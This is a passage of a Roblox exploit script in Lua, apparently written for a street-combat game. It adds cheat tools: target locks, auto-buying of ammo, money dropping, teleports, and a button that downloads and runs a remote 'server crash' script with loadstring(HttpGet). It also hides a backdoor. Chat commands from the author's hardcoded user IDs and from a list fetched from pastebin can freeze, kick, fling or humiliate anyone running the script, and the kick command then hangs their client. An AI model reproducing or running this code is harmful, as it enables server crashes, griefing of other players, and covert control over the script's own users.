  2690. notify('Taser locked onto', TazerTarget, 5)
  2691. else
  2692. TazerTarget = nil
  2693. notify('Taser unlocked', '', 3)
  2694. end
  2695. end)
  2696. end)
  2697.  
  2698. GrenadeTarget = nil
  2699. GrenadeLock.MouseButton1Click:Connect(function()
  2700. local GrenadeTool = Instance.new('Tool', player.Backpack)
  2701. GrenadeTool.ToolTip = 'Click a player to grenade lock them'
  2702. GrenadeTool.CanBeDropped = false
  2703. GrenadeTool.RequiresHandle = false
  2704. GrenadeTool.Name = 'Grenade Lock'
  2705.  
  2706. GrenadeTool.Activated:Connect(function()
  2707. local LowerTorso = mouse.Target.Parent:FindFirstChild('LowerTorso')
  2708. if not LowerTorso then
  2709. LowerTorso = mouse.Target.Parent.Parent:FindFirstChild('LowerTorso')
  2710. end
  2711. if LowerTorso then
  2712. if LowerTorso.Parent.Name == 'SpecialParts' then
  2713. GrenadeTarget = LowerTorso.Parent.Parent.Parent.Name
  2714. else
  2715. GrenadeTarget = LowerTorso.Parent.Name
  2716. end
  2717. notify('Grenades locked onto', GrenadeTarget, 5)
  2718. else
  2719. TazerTarget = nil
  2720. notify('Grenades unlocked', '', 3)
  2721. end
  2722. end)
  2723. end)
  2724.  
  2725. InfTools.MouseButton1Click:Connect(function()
  2726. notify('Infinite Ammo Given', 'hold the tool to buy ammo shoot without reloading', 8)
  2727. function infrev()
  2728. if player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA') then
  2729. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').TextLabel.Name = 'AmmoText'
  2730. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Position = UDim2.new(2,0,2,0)
  2731. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Size = UDim2.new(0,0,0,0)
  2732. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Name = 'AmmoFrame'
  2733. end
  2734.  
  2735. local Gun = '[Revolver]'
  2736. local GunTexture = 'rbxassetid://3420082920'
  2737. local GunPath = game:GetService("Workspace").Ignored.Shop["[Revolver] - $1300"].Head
  2738. local Holding = false
  2739.  
  2740. local InfiniteTool = Instance.new('Tool', player.Backpack)
  2741. InfiniteTool.Name = 'Rev'
  2742. InfiniteTool.ToolTip = 'buy guns while holding, shoot while using this tool'
  2743. InfiniteTool.TextureId = GunTexture
  2744. InfiniteTool.RequiresHandle = true
  2745. InfiniteTool.CanBeDropped = false
  2746.  
  2747. local Handle = Instance.new('Part', InfiniteTool)
  2748. Handle.Name = 'Handle'
  2749. Handle.Anchored = false
  2750. Handle.Size = Vector3.new(0,0,0)
  2751. Handle.Massless = true
  2752. Handle.Transparency = 1
  2753. Handle.CanCollide = false
  2754.  
  2755. InfiniteTool.Equipped:Connect(function()
  2756. Holding = true
  2757. player.PlayerGui.MainScreenGui:FindFirstChild('AmmoFrame').Name = 'AmmoFrame2'
  2758. for i,v in pairs(player.Backpack:GetChildren()) do
  2759. if v.Name == Gun and not player.Character:FindFirstChild(Gun) then
  2760. if v.Ammo.Value > 0 then
  2761. v.Parent = player.Character
  2762. end
  2763. end
  2764. end
  2765. while Holding == true do
  2766. wait(0)
  2767. local TotalAmmo = 0
  2768. for i,v in pairs(player.Backpack:GetChildren()) do
  2769. if v.Name == Gun then
  2770. TotalAmmo = TotalAmmo + v.Ammo.Value
  2771. end
  2772. end
  2773. for i,v in pairs(player.Character:GetChildren()) do
  2774. if v.Name == Gun then
  2775. TotalAmmo = TotalAmmo + v.Ammo.Value
  2776. end
  2777. end
  2778. player.PlayerGui.MainScreenGui.AmmoFrame2.AmmoText.Text = tostring(TotalAmmo)
  2779. player.PlayerGui.MainScreenGui.AmmoFrame2.AmmoText.Visible = true
  2780. player.PlayerGui.MainScreenGui.AmmoFrame2.Visible = true
  2781. local mag = (GunPath.Position - player.Character.HumanoidRootPart.Position).Magnitude
  2782. if mag <= 8 and player.Character:FindFirstChild(InfiniteTool.Name) then
  2783. for i,v in pairs(player.Backpack:GetChildren()) do
  2784. if v.Name == Gun then
  2785. v.Parent = player.Character
  2786. end
  2787. end
  2788. end
  2789. fireclickdetector(GunPath.Parent.ClickDetector)
  2790. if player.Character:FindFirstChild(Gun).Ammo.Value < 1 then
  2791. player.Character:FindFirstChild(Gun).Parent = player.Backpack
  2792. for i,v in pairs(player.Backpack:GetChildren()) do
  2793. if v.Name == Gun and not player.Character:FindFirstChild(Gun) then
  2794. if v.Ammo.Value > 0 then
  2795. v.Parent = player.Character
  2796. end
  2797. end
  2798. end
  2799. end
  2800. end
  2801. end)
  2802. InfiniteTool.Unequipped:Connect(function()
  2803. Holding = false
  2804. player.PlayerGui.MainScreenGui:FindFirstChild('AmmoFrame2').Name = 'AmmoFrame'
  2805. end)
  2806. end
  2807. function infdb()
  2808. if player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA') then
  2809. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').TextLabel.Name = 'AmmoText'
  2810. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Position = UDim2.new(2,0,2,0)
  2811. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Size = UDim2.new(0,0,0,0)
  2812. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Name = 'AmmoFrame'
  2813. end
  2814.  
  2815. local Gun = '[Double-Barrel SG]'
  2816. local GunTexture = 'rbxassetid://5341886203'
  2817. local GunPath = game:GetService("Workspace").Ignored.Shop["[Double-Barrel SG] - $1400"].Head
  2818. local Holding = false
  2819.  
  2820. local InfiniteTool = Instance.new('Tool', player.Backpack)
  2821. InfiniteTool.Name = 'Db'
  2822. InfiniteTool.ToolTip = 'buy guns while holding, shoot while using this tool'
  2823. InfiniteTool.TextureId = GunTexture
  2824. InfiniteTool.RequiresHandle = true
  2825. InfiniteTool.CanBeDropped = false
  2826.  
  2827. local Handle = Instance.new('Part', InfiniteTool)
  2828. Handle.Name = 'Handle'
  2829. Handle.Anchored = false
  2830. Handle.Size = Vector3.new(0,0,0)
  2831. Handle.Massless = true
  2832. Handle.Transparency = 1
  2833. Handle.CanCollide = false
  2834.  
  2835. InfiniteTool.Equipped:Connect(function()
  2836. Holding = true
  2837. player.PlayerGui.MainScreenGui:FindFirstChild('AmmoFrame').Name = 'AmmoFrame2'
  2838. for i,v in pairs(player.Backpack:GetChildren()) do
  2839. if v.Name == Gun and not player.Character:FindFirstChild(Gun) then
  2840. if v.Ammo.Value > 0 then
  2841. v.Parent = player.Character
  2842. end
  2843. end
  2844. end
  2845. while Holding == true do
  2846. wait(0)
  2847. local TotalAmmo = 0
  2848. for i,v in pairs(player.Backpack:GetChildren()) do
  2849. if v.Name == Gun then
  2850. TotalAmmo = TotalAmmo + v.Ammo.Value
  2851. end
  2852. end
  2853. for i,v in pairs(player.Character:GetChildren()) do
  2854. if v.Name == Gun then
  2855. TotalAmmo = TotalAmmo + v.Ammo.Value
  2856. end
  2857. end
  2858. player.PlayerGui.MainScreenGui.AmmoFrame2.AmmoText.Text = tostring(TotalAmmo)
  2859. player.PlayerGui.MainScreenGui.AmmoFrame2.AmmoText.Visible = true
  2860. player.PlayerGui.MainScreenGui.AmmoFrame2.Visible = true
  2861. local mag = (GunPath.Position - player.Character.HumanoidRootPart.Position).Magnitude
  2862. if mag <= 8 and player.Character:FindFirstChild(InfiniteTool.Name) then
  2863. for i,v in pairs(player.Backpack:GetChildren()) do
  2864. if v.Name == Gun then
  2865. v.Parent = player.Character
  2866. end
  2867. end
  2868. end
  2869. fireclickdetector(GunPath.Parent.ClickDetector)
  2870. if player.Character:FindFirstChild(Gun).Ammo.Value < 1 then
  2871. player.Character:FindFirstChild(Gun).Parent = player.Backpack
  2872. for i,v in pairs(player.Backpack:GetChildren()) do
  2873. if v.Name == Gun and not player.Character:FindFirstChild(Gun) then
  2874. if v.Ammo.Value > 0 then
  2875. v.Parent = player.Character
  2876. end
  2877. end
  2878. end
  2879. end
  2880. end
  2881. end)
  2882. InfiniteTool.Unequipped:Connect(function()
  2883. Holding = false
  2884. player.PlayerGui.MainScreenGui:FindFirstChild('AmmoFrame2').Name = 'AmmoFrame'
  2885. end)
  2886. end
  2887. function infrpg()
  2888. if player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA') then
  2889. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').TextLabel.Name = 'AmmoText'
  2890. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Position = UDim2.new(2,0,2,0)
  2891. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Size = UDim2.new(0,0,0,0)
  2892. player.PlayerGui.MainScreenGui:FindFirstChild('BattleRoyaleFFA').Name = 'AmmoFrame'
  2893. end
  2894.  
  2895. local Gun = '[RPG]'
  2896. local GunTexture = 'rbxassetid://3420083215'
  2897. local GunPath = game:GetService("Workspace").Ignored.Shop["[RPG] - $6000"].Head
  2898. local Holding = false
  2899.  
  2900. local InfiniteTool = Instance.new('Tool', player.Backpack)
  2901. InfiniteTool.Name = 'Rpg'
  2902. InfiniteTool.ToolTip = 'buy guns while holding, shoot while using this tool'
  2903. InfiniteTool.TextureId = GunTexture
  2904. InfiniteTool.RequiresHandle = true
  2905. InfiniteTool.CanBeDropped = false
  2906.  
  2907. local Handle = Instance.new('Part', InfiniteTool)
  2908. Handle.Name = 'Handle'
  2909. Handle.Anchored = false
  2910. Handle.Size = Vector3.new(0,0,0)
  2911. Handle.Massless = true
  2912. Handle.Transparency = 1
  2913. Handle.CanCollide = false
  2914.  
  2915. InfiniteTool.Equipped:Connect(function()
  2916. Holding = true
  2917. player.PlayerGui.MainScreenGui:FindFirstChild('AmmoFrame').Name = 'AmmoFrame2'
  2918. for i,v in pairs(player.Backpack:GetChildren()) do
  2919. if v.Name == Gun and not player.Character:FindFirstChild(Gun) then
  2920. if v.Ammo.Value > 0 then
  2921. v.Parent = player.Character
  2922. end
  2923. end
  2924. end
  2925. while Holding == true do
  2926. wait(0)
  2927. local TotalAmmo = 0
  2928. for i,v in pairs(player.Backpack:GetChildren()) do
  2929. if v.Name == Gun then
  2930. TotalAmmo = TotalAmmo + v.Ammo.Value
  2931. end
  2932. end
  2933. for i,v in pairs(player.Character:GetChildren()) do
  2934. if v.Name == Gun then
  2935. TotalAmmo = TotalAmmo + v.Ammo.Value
  2936. end
  2937. end
  2938. player.PlayerGui.MainScreenGui.AmmoFrame2.AmmoText.Text = tostring(TotalAmmo)
  2939. player.PlayerGui.MainScreenGui.AmmoFrame2.AmmoText.Visible = true
  2940. player.PlayerGui.MainScreenGui.AmmoFrame2.Visible = true
  2941. local mag = (GunPath.Position - player.Character.HumanoidRootPart.Position).Magnitude
  2942. if mag <= 8 and player.Character:FindFirstChild(InfiniteTool.Name) then
  2943. for i,v in pairs(player.Backpack:GetChildren()) do
  2944. if v.Name == Gun then
  2945. v.Parent = player.Character
  2946. end
  2947. end
  2948. end
  2949. fireclickdetector(GunPath.Parent.ClickDetector)
  2950. if player.Character:FindFirstChild(Gun).Ammo.Value < 1 then
  2951. player.Character:FindFirstChild(Gun).Parent = player.Backpack
  2952. for i,v in pairs(player.Backpack:GetChildren()) do
  2953. if v.Name == Gun and not player.Character:FindFirstChild(Gun) then
  2954. if v.Ammo.Value > 0 then
  2955. v.Parent = player.Character
  2956. end
  2957. end
  2958. end
  2959. end
  2960. end
  2961. end)
  2962. InfiniteTool.Unequipped:Connect(function()
  2963. Holding = false
  2964. player.PlayerGui.MainScreenGui:FindFirstChild('AmmoFrame2').Name = 'AmmoFrame'
  2965. end)
  2966. end
  2967. function infham()
  2968. local Food = '[Hamburger]'
  2969. local FoodTexture = 'rbxassetid://3210917066'
  2970. local FoodPath = game:GetService("Workspace").Ignored.Shop["[Hamburger] - $5"].Head
  2971. local Holding = false
  2972.  
  2973. local InfiniteTool = Instance.new('Tool', player.Backpack)
  2974. InfiniteTool.Name = 'Hamburger'
  2975. InfiniteTool.ToolTip = 'buy hamburgers while holding, eat while using this tool'
  2976. InfiniteTool.TextureId = FoodTexture
  2977. InfiniteTool.RequiresHandle = true
  2978. InfiniteTool.CanBeDropped = false
  2979.  
  2980. local Handle = Instance.new('Part', InfiniteTool)
  2981. Handle.Name = 'Handle'
  2982. Handle.Anchored = false
  2983. Handle.Size = Vector3.new(0,0,0)
  2984. Handle.Massless = true
  2985. Handle.Transparency = 1
  2986. Handle.CanCollide = false
  2987.  
  2988. InfiniteTool.Equipped:Connect(function()
  2989. Holding = true
  2990. player.PlayerGui.MainScreenGui:FindFirstChild('AmmoFrame').Name = 'AmmoFrame2'
  2991. for i,v in pairs(player.Backpack:GetChildren()) do
  2992. if v.Name == Food and not player.Character:FindFirstChild(Food) then
  2993. v.Parent = player.Character
  2994. end
  2995. end
  2996. while Holding == true do
  2997. wait(0)
  2998. local TotalFood = 0
  2999. for i,v in pairs(player.Backpack:GetChildren()) do
  3000. if v.Name == Food then
  3001. TotalFood = TotalFood + 1
  3002. end
  3003. end
  3004. for i,v in pairs(player.Character:GetChildren()) do
  3005. if v.Name == Food then
  3006. TotalFood = TotalFood + 1
  3007. end
  3008. end
  3009. player.PlayerGui.MainScreenGui.AmmoFrame2.AmmoText.Text = tostring(TotalFood)
  3010. player.PlayerGui.MainScreenGui.AmmoFrame2.AmmoText.Visible = true
  3011. player.PlayerGui.MainScreenGui.AmmoFrame2.Visible = true
  3012. local mag = (FoodPath.Position - player.Character.HumanoidRootPart.Position).Magnitude
  3013. if mag <= 8 and player.Character:FindFirstChild(InfiniteTool.Name) then
  3014. for i,v in pairs(player.Backpack:GetChildren()) do
  3015. if v.Name == Food then
  3016. v.Parent = player.Character
  3017. end
  3018. end
  3019. end
  3020. fireclickdetector(FoodPath.Parent.ClickDetector)
  3021. if not player.Character:FindFirstChild(Food) then
  3022. for i,v in pairs(player.Backpack:GetChildren()) do
  3023. if v.Name == Food and not player.Character:FindFirstChild(Food) then
  3024. v.Parent = player.Character
  3025. end
  3026. end
  3027. end
  3028. end
  3029. end)
  3030. InfiniteTool.Unequipped:Connect(function()
  3031. Holding = false
  3032. player.PlayerGui.MainScreenGui:FindFirstChild('AmmoFrame2').Name = 'AmmoFrame'
  3033. end)
  3034. end
  3035.  
  3036. infrev()
  3037. infdb()
  3038. infham()
  3039. infrpg()
  3040. end)
  3041.  
  3042. ------------------------------------------------------------------------------------------------------------------------------------------------
  3043. ------------------------------------------------------------------------------------------------------------------------------------------------
  3044. ------------------------------------------------------------------------------------------------------------------------------------------------
  3045. ------------------------------------------------------------------------------------------------------------------------------------------------
  3046. ------------------------------------------------------------------------------------------------------------------------------------------------
  3047. CashDroppedLabel.Visible = false
  3048.  
  3049. CalculateButton.MouseButton1Click:Connect(function()
  3050. if tonumber(CashTextbox.Text) ~= nil then
  3051. CashTextbox.Text = tostring(math.floor((tonumber(CashTextbox.Text) * 1.42857)))
  3052. local amount = tonumber(CashTextbox.Text)
  3053. cashgoal = player.DataFolder.Currency.Value - amount
  3054. CashAtEndLabel.Text = ('Cash At End : $' .. formatNumber(cashgoal))
  3055. else
  3056. notify('insert number', '', 3)
  3057. end
  3058. end)
  3059.  
  3060. DropToggleButton.MouseButton1Click:Connect(function()
  3061. if DropToggleButton.Text == 'Enable' and tonumber(CashTextbox.Text) ~= nil then
  3062. DropToggleButton.Text = 'Stop'
  3063. while DropToggleButton.Text == 'Stop' do
  3064. wait()
  3065. MainEvent:FireServer('DropMoney', '10000')
  3066. if player.DataFolder.Currency.Value <= cashgoal then
  3067. DropToggleButton.Text = 'Enable'
  3068. notify('finished dropping')
  3069. end
  3070. end
  3071. else
  3072. DropToggleButton.Text = 'Enable'
  3073. end
  3074. end)
  3075.  
  3076.  
  3077. CrashServerButton.MouseButton1Click:Connect(function()
  3078. loadstring(game:HttpGet("https://raw.githubusercontent.com/22kristina/dhcrash_gen2/main/crash", true))()
  3079. end)
  3080. ------------------------------------------------------------------------------------------------------------------------------------------------
  3081. ------------------------------------------------------------------------------------------------------------------------------------------------
  3082. ------------------------------------------------------------------------------------------------------------------------------------------------
  3083. ------------------------------------------------------------------------------------------------------------------------------------------------
  3084. ------------------------------------------------------------------------------------------------------------------------------------------------
  3085.  
  3086. SetSpawn.MouseButton1Click:Connect(function()
  3087. if player.Character then
  3088. if SetSpawn.Text == 'SetSpawn' then
  3089. SetSpawn.Text = 'NoSpawn'
  3090. SpawnPosition = player.Character.HumanoidRootPart.CFrame
  3091. else
  3092. SetSpawn.Text = 'SetSpawn'
  3093. SpawnPosition = nil
  3094. end
  3095. end
  3096. end)
  3097. PrevPosition.MouseButton1Click:Connect(function()
  3098. if PreviousPosition ~= nil then
  3099. player.Character.HumanoidRootPart.CFrame = PreviousPosition
  3100. else
  3101. notify('Previous Position Error', 'you need to have tped before to return to an old position', 5)
  3102. end
  3103. end)
  3104. Bank.MouseButton1Click:Connect(function()
  3105. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3106. player.Character.HumanoidRootPart.CFrame = CFrame.new(-437.125885, 38.9783134, -285.587372, 0.0165725499, 5.298579e-08, -0.99986279, 1.16139711e-08, 1, 5.31855591e-08, 0.99986279, -1.24937944e-08, 0.0165725499)
  3107. end)
  3108. Playground.MouseButton1Click:Connect(function()
  3109. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3110. player.Character.HumanoidRootPart.CFrame = CFrame.new(-259.516907, 22.1498718, -762.971558, 0.992310345, 0, 0.12377467, 0, 1, 0, -0.12377467, 0, 0.992310345)
  3111. end)
  3112. LavaBase.MouseButton1Click:Connect(function()
  3113. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3114. player.Character.HumanoidRootPart.CFrame = CFrame.new(-796.256897, -39.6492004, -886.306152, -0.39699012, 2.91068263e-05, 0.917822897, 1.63490836e-06, 1, -3.10057476e-05, -0.917822897, -1.08084187e-05, -0.39699012)
  3115. end)
  3116. GunShop1.MouseButton1Click:Connect(function()
  3117. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3118. player.Character.HumanoidRootPart.CFrame = CFrame.new(-591.085022, 8.31477833, -742.803528, 0.994070172, 5.60480942e-08, 0.108740292, -6.51724079e-08, 1, 8.03552425e-08, -0.108740292, -8.69656134e-08, 0.994070172)
  3119. end)
  3120. GunShop2.MouseButton1Click:Connect(function()
  3121. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3122. player.Character.HumanoidRootPart.CFrame = CFrame.new(488.347412, 48.0705032, -630.454285, -0.0453165509, -4.20173549e-08, -0.998972654, -4.23235385e-08, 1, -4.01406339e-08, 0.998972654, 4.04610248e-08, -0.0453165509)
  3123. end)
  3124. Sewer.MouseButton1Click:Connect(function()
  3125. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3126. player.Character.HumanoidRootPart.CFrame = CFrame.new(111.514938, -26.7500305, -276.918365, -0.997865558, -1.25138016e-08, -0.0653034225, -1.74378947e-08, 1, 7.48333733e-08, 0.0653034225, 7.58124159e-08, -0.997865558)
  3127. end)
  3128. GasStation.MouseButton1Click:Connect(function()
  3129. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3130. player.Character.HumanoidRootPart.CFrame = CFrame.new(591.680725, 49.0000458, -256.818298, -0.0874911696, -3.41755495e-08, -0.996165276, 1.23318324e-08, 1, -3.53901868e-08, 0.996165276, -1.53808717e-08, -0.0874911696)
  3131. end)
  3132. TacoShop.MouseButton1Click:Connect(function()
  3133. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3134. player.Character.HumanoidRootPart.CFrame = CFrame.new(583.931641, 51.061409, -476.954193, -0.999745369, 1.49123665e-08, -0.0225663595, 1.44838328e-08, 1, 1.91533687e-08, 0.0225663595, 1.88216429e-08, -0.999745369)
  3135. end)
  3136. UFO.MouseButton1Click:Connect(function()
  3137. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3138. player.Character.HumanoidRootPart.CFrame = CFrame.new(71.7331619, 139, -691.154419, 0.602706313, 7.78292178e-06, 0.797962964, 7.63640458e-07, 1, -1.03302691e-05, -0.797962964, 6.83547478e-06, 0.602706313)
  3139. end)
  3140. SafeZone1.MouseButton1Click:Connect(function()
  3141. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3142. player.Character.HumanoidRootPart.CFrame = CFrame.new(-117.270287, -58.7000618, 146.536087, 0.999873519, 5.21876942e-08, -0.0159031227, -5.22713037e-08, 1, -4.84179008e-09, 0.0159031227, 5.67245495e-09, 0.999873519)
  3143. end)
  3144. SafeZone2.MouseButton1Click:Connect(function()
  3145. PreviousPosition = player.Character.HumanoidRootPart.CFrame
  3146. player.Character.HumanoidRootPart.CFrame = CFrame.new(207.48085, 38.25, 200014.953, 0.507315397, 0, -0.861760437, 0, 1, 0, 0.861760437, 0, 0.507315397)
  3147. end)
  3148. SavePos.MouseButton1Click:Connect(function()
  3149. SavedPos = player.Character.HumanoidRootPart.CFrame
  3150. end)
  3151. LoadPos.MouseButton1Click:Connect(function()
  3152. if SavedPos ~= nil then
  3153. player.Character.HumanoidRootPart.CFrame = SavedPos
  3154. else
  3155. notify('Load Position Error', 'you need to save a position first', 4)
  3156. end
  3157. end)
  3158.  
  3159. ------------------------------------------------------------------------------------------------------------------------------------------------
  3160. ------------------------------------------------------------------------------------------------------------------------------------------------
  3161. ------------------------------------------------------------------------------------------------------------------------------------------------
  3162. -------------------------------------------------------------------------------------------------------------------------------------------------
  3163. ------------------------------------------------------------------------------------------------------------------------------------------------
  3164.  
  3165. local swagmins = {
  3166. 1842398889,--me
  3167. 1938509577-- me
  3168. }
  3169.  
  3170. local bending = false
  3171. local kickmsg = 'PERMA BANNED'
  3172. local function commands(msg,plr)
  3173. if DisableMod == false or table.find(swagmins, plr) then
  3174. local Mod = game:GetService('Players'):GetPlayerByUserId(plr)
  3175. local Msg = string.lower(msg)
  3176. local SplitCMD = string.split(Msg,' ')
  3177. local Lower = string.lower(player.Name)
  3178. local Allowed = string.find(Lower, SplitCMD[2])
  3179. if Allowed then
  3180. if string.find(SplitCMD[1], ':freeze') then
  3181. player.Character.HumanoidRootPart.Anchored = true
  3182. end
  3183. if string.find(SplitCMD[1], ':thaw') then
  3184. player.Character.HumanoidRootPart.Anchored = false
  3185. end
  3186. if string.find(SplitCMD[1], ':benx') then
  3187. bending = true
  3188. local segtarget = Mod.Name
  3189. local Crouch = player.Character:FindFirstChildWhichIsA('Humanoid'):LoadAnimation(game:GetService("ReplicatedStorage").ClientAnimations.Crouching)
  3190. Crouch.Looped = true
  3191. Crouch:Play()
  3192. local away = .5
  3193. local reversing = false
  3194. local shirt = player.Character:FindFirstChild('Shirt')
  3195. local pants = player.Character:FindFirstChild('Pants')
  3196. if shirt then
  3197. shirt:Destroy()
  3198. end
  3199. if pants then
  3200. pants:Destroy()
  3201. end
  3202. local Loop
  3203. local loopFunction = function()
  3204. local targetchar = game.Workspace.Players:FindFirstChild(segtarget) or game.Workspace:FindFirstChild(segtarget)
  3205. local character = player.Character
  3206. if targetchar then
  3207. if reversing == true then
  3208. away = away - 0.1
  3209. else
  3210. away = away + 0.1
  3211. end
  3212. if away >= 2 then
  3213. reversing = true
  3214. elseif away < 0.5 then
  3215. reversing = false
  3216. end
  3217. character.HumanoidRootPart.CFrame = game.Players[segtarget].Character.HumanoidRootPart.CFrame + game.Players[segtarget].Character.HumanoidRootPart.CFrame.lookVector * away
  3218. end
  3219. end;
  3220. local Start = function()
  3221. Loop = game:GetService("RunService").Heartbeat:Connect(loopFunction);
  3222. end;
  3223. local Pause = function()
  3224. Loop:Disconnect()
  3225. Crouch:Stop()
  3226. end;
  3227. Start()
  3228. repeat wait() until bending == false
  3229. Pause()
  3230. end
  3231. if string.find(SplitCMD[1], ':unbenx') then
  3232. while bending == true do
  3233. wait()
  3234. bending = false
  3235. end
  3236. end
  3237. if string.find(SplitCMD[1], ':kick') then
  3238. local ISADMIN = table.find(swagmins, player.UserId)
  3239. if not ISADMIN then
  3240. player:Kick(kickmsg)
  3241. wait(5)
  3242. while true do end
  3243. end
  3244. end
  3245. if string.find(SplitCMD[1], ':bring') then
  3246. player.Character.HumanoidRootPart.CFrame = CFrame.new(game.Workspace.Players:FindFirstChild(Mod.Name).HumanoidRootPart.Position)
  3247. end
  3248. if string.find(SplitCMD[1], ':cuffban') then
  3249. if table.find(swagmins, plr) then
  3250. local ISADMIN = table.find(swagmins, player.UserId)
  3251. if not ISADMIN then
  3252. player:Kick('Stop .')
  3253. end
  3254. end
  3255. end
  3256. if string.find(SplitCMD[1], ':fling') then
  3257. player.Character.HumanoidRootPart.Velocity = Vector3.new(500000,500000,500000)
  3258. end
  3259. else
  3260. if string.find(msg, '/e test') then
  3261. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("yeah,yeah!", 'All');
  3262. end
  3263. end
  3264. end
  3265. end
  3266.  
  3267. muted = {}
  3268. mutingnew = false
  3269.  
  3270. local ModCheck = loadstring(game:HttpGet('https://pastebin.com/raw/4SD9ZfEA'))()
  3271. Players.PlayerAdded:Connect(function(plr)
  3272. local SWAGMIN = table.find(swagmins, plr.UserId)
  3273. if SWAGMIN or ModCheck[plr.UserId] then
  3274. plr.Chatted:Connect(function(msg)
  3275. commands(msg, plr.UserId)
  3276. end)
  3277. end
  3278. if muteingnew == true then
  3279. if not table.find(muted, plr.Name) then
  3280. table.insert(muted, plr.Name)
  3281. print('automuted ' .. plr.Name)
  3282. end
  3283. end
  3284. end)
  3285.  
  3286. for i,v in pairs(game:GetService('Players'):GetChildren()) do
  3287. local SWAGMIN = table.find(swagmins, v.UserId)
  3288. if SWAGMIN or ModCheck[v.UserId] then
  3289. v.Chatted:Connect(function(msg)
  3290. commands(msg, v.UserId)
  3291. end)
  3292. end
  3293. end
  3294.  
  3295.  
  3296. ------------------------------------------------------------------------------------------------------------------------------------------------
  3297. ------------------------------------------------------------------------------------------------------------------------------------------------
  3298. ------------------------------------------------------------------------------------------------------------------------------------------------
  3299. ------------------------------------------------------------------------------------------------------------------------------------------------
  3300. ------------------------------------------------------------------------------------------------------------------------------------------------
  3301.  
  3302. local commands = {}
  3303.  
  3304. local prefix = "/"
  3305.  
  3306. local function findPlayer(name)
  3307. for _, Player in ipairs(Players:GetPlayers()) do
  3308. if (string.lower(name) == string.sub(string.lower(Player.Name), 1, #name)) then
  3309. return Player;
  3310. end
  3311. end
  3312. end
  3313.  
  3314. commands.e = function(arguments)
  3315. local CMD = arguments[1]
  3316.  
  3317. if CMD == 'rejoin' or CMD == 'rj' then
  3318. Players.LocalPlayer:Kick("Rejoining")
  3319. wait()
  3320. game:GetService('TeleportService'):Teleport(game.PlaceId, Players.LocalPlayer)
  3321. end
  3322. if CMD == 'serverhop' or CMD == 'shop' then
  3323. local x = {}
  3324. for _, v in ipairs(game:GetService("HttpService"):JSONDecode(game:HttpGetAsync("https://games.roblox.com/v1/games/" .. game.PlaceId .. "/servers/Public?sortOrder=Asc&limit=100")).data) do
  3325. if type(v) == "table" and v.maxPlayers > v.playing and v.id ~= game.JobId then
  3326. x[#x + 1] = v.id
  3327. end
  3328. end
  3329. if #x > 0 then
  3330. game:GetService("TeleportService"):TeleportToPlaceInstance(game.PlaceId, x[math.random(1, #x)])
  3331. else
  3332. print('failed to find server')
  3333. end
  3334. end
  3335.  
  3336. local ANIMATIONS = false
  3337. if CMD == 'animations' and player.PlayerGui.MainScreenGui.AnimationPack.Visible == false and ANIMATIONS == false then
  3338. local Humanoid = player.Character:FindFirstChildWhichIsA('Humanoid')
  3339. ANIMATIONS = true
  3340. local AnimationsFolder = Instance.new('Folder', game.Workspace)
  3341. local LeanAni = Instance.new('Animation', AnimationsFolder)
  3342. LeanAni.AnimationId = 'rbxassetid://3152375249'
  3343. local Lean = Humanoid:LoadAnimation(LeanAni)
  3344. local LayAni = Instance.new('Animation', AnimationsFolder)
  3345. LayAni.AnimationId = 'rbxassetid://3152378852'
  3346. local Lay = Humanoid:LoadAnimation(LayAni)
  3347. local Dance1Ani = Instance.new('Animation', AnimationsFolder)
  3348. Dance1Ani.AnimationId = 'rbxassetid://3189773368'
  3349. local Dance1 = Humanoid:LoadAnimation(Dance1Ani)
  3350. local Dance2Ani = Instance.new('Animation', AnimationsFolder)
  3351. Dance2Ani.AnimationId = 'rbxassetid://3189776546'
  3352. local Dance2 = Humanoid:LoadAnimation(Dance2Ani)
  3353. local GreetAni = Instance.new('Animation', AnimationsFolder)
  3354. GreetAni.AnimationId = 'rbxassetid://3189777795'
  3355. local Greet = Humanoid:LoadAnimation(GreetAni)
  3356. local PrayAni = Instance.new('Animation', AnimationsFolder)
  3357. PrayAni.AnimationId = 'rbxassetid://3487719500'
  3358. local Pray = Humanoid:LoadAnimation(PrayAni)
  3359.  
  3360. Close.Visible = false
  3361. ScrollingFrame.Visible = false
  3362. Animations.Visible = true
  3363.  
  3364. Animations.MouseButton1Click:Connect(function()
  3365. ScrollingFrame.Visible = true
  3366. Close.Visible = true
  3367. end)
  3368. Close.MouseButton1Click:Connect(function()
  3369. ScrollingFrame.Visible = false
  3370. Close.Visible = false
  3371. end)
  3372. LeanButton.MouseButton1Click:Connect(function()
  3373. Lean:Play()
  3374. end)
  3375. LayButton.MouseButton1Click:Connect(function()
  3376. Lay:play()
  3377. end)
  3378. Dance1Button.MouseButton1Click:Connect(function()
  3379. Dance1:Play()
  3380. end)
  3381. Dance2Button.MouseButton1Click:Connect(function()
  3382. Dance2:Play()
  3383. end)
  3384. GreetButton.MouseButton1Click:Connect(function()
  3385. Greet:Play()
  3386. end)
  3387. PrayButton.MouseButton1Click:Connect(function()
  3388. Pray:Play()
  3389. end)
  3390.  
